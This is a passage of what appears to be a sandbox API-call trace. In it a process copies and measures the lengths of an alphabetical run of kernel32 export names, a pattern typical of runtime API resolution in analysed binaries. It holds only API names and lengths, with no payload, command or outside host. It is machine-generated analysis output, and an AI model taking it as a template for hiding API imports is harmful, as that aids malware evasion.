lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.756] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.756] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.756] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.756] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.756] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.756] lstrlenA (lpString="COPYFILEA") returned 9 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.756] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.756] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.757] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.757] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.757] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.757] lstrlenA (lpString="COPYFILEW") returned 9 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.757] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.757] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.757] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.757] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.757] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.757] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.757] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.757] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.757] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.757] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.757] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.757] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.757] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.757] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.758] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.758] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.758] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.758] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.758] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.758] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.758] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.758] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.758] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.758] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.758] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.758] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.758] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.758] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.758] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.758] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.758] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.758] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.759] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.759] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.759] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.759] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.759] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.759] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.759] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.759] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.759] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.759] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.759] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.759] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.759] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.759] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.759] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.759] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.759] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.759] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.759] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.759] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.760] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.760] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.760] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.760] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.760] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.760] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.760] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.760] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.760] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.760] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.760] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.760] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.760] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.760] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.760] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.760] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.760] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.760] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.760] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.761] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.761] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.761] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.761] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.761] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.761] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.761] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.761] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.761] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.761] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.761] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.761] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.761] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.761] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.761] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.761] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.761] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.761] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.761] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.762] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.762] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.762] lstrlenA (lpString="DELETEATOM") returned 10 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.762] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.762] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.762] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.762] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.762] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.762] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.762] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.762] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.762] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.762] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.762] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.762] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.762] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.762] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.762] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.762] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.763] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.763] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.763] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.763] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.763] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.763] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.763] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.763] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.763] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.763] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.763] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.763] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") 